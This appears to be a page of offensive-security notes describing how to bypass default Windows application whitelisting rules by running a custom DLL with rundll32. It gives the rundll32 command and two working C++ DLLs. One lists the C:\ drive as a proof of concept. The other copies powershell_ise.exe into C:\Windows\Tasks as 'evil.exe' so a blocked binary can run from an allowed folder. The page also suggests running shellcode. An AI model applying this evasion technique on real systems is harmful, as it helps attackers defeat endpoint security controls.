DLL

Default rules can be bypassed by executing .dll using rundll32:

rundll32 test2.dll,CreateDirAndCopyFile

Where CreateDirAndCopyFile should be the function name within your DLL.

Examples

In the following example we will list the C:\ disk as a poc:

// test2.cpp : Defines the exported functions for the DLL.
//

#include "pch.h"
#include "framework.h"
#include "test2.h"
#include <windows.h>
#include <string>
#include <sstream>

// Include <filesystem> with appropriate compatibility namespace
#if __has_include(<filesystem>)
#include <filesystem>
namespace fs = std::filesystem;
#elif __has_include(<experimental/filesystem>)
#include <experimental/filesystem>
namespace fs = std::experimental::filesystem;
#else
#error "No filesystem support."
#endif

extern "C" __declspec(dllexport) void ShowDirectoryContents()
{
    std::ostringstream directoryContents;
    std::string directoryPath = "C:\\";

    try
    {
        // Enumerate files and directories in C:\
        
        for (fs::directory_iterator iter(directoryPath), end; iter != end; ++iter)
        {
            directoryContents << iter->path().string() << "\n";
        }

        // Get the list as a single string
        std::string contents = directoryContents.str();

        // Ensure the content does not exceed the message box limit (around 4096 characters)
        if (contents.size() > 4000) {
            contents = contents.substr(0, 4000) + "\n... (Output truncated)";
        }

        // Show the contents in a message box
        MessageBoxA(NULL, contents.c_str(), "C:\\ Directory Contents", MB_OK | MB_ICONINFORMATION);
    }
    catch (const fs::filesystem_error& e)
    {
        // Display an error message if there's an issue accessing the directory
        MessageBoxA(NULL, e.what(), "Error Accessing Directory", MB_OK | MB_ICONERROR);
    }
}

In the following example we will move powershell.exe to an allowed folder.

// test3.cpp : Defines the exported functions for the DLL.
//

#include "pch.h"
#include "framework.h"
#include "test2.h"
#include <windows.h>
#include <shlwapi.h>
#include <string>

// Exported variable
TEST2_API int ntest3 = 0;

// Function to create directory and copy file
extern "C" __declspec(dllexport) bool CreateDirAndCopyFile()
{
    // Define the directory and file paths
    LPCWSTR directoryPath = L"C:\\Windows\\Tasks";
    LPCWSTR sourceFilePath = L"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe"; // Update with the actual source path
    LPCWSTR destinationFilePath = L"C:\\Windows\\Tasks\\evil.exe";

    // Create the directory if it doesn't exist
    if (!CreateDirectoryW(directoryPath, NULL)) {
        if (GetLastError() != ERROR_ALREADY_EXISTS) {
            return false; // Failed to create the directory
        }
    }

    // Copy the file to the new directory
    if (!CopyFileW(sourceFilePath, destinationFilePath, FALSE)) {
        return false; // Failed to copy the file
    }

    return true; // Directory created and file copied successfully
}

// Example of an exported function
TEST2_API int fntest3(void)
{
    return 0;
}

// Constructor for exported class
Ctest2::Ctest2()
{
    return;
}

With a DLL you can pretty much do everything since you can directly talk to the Windows APIs, these are just examples, you can ofcourse also just run Shellcode.

Last updated 8 months ago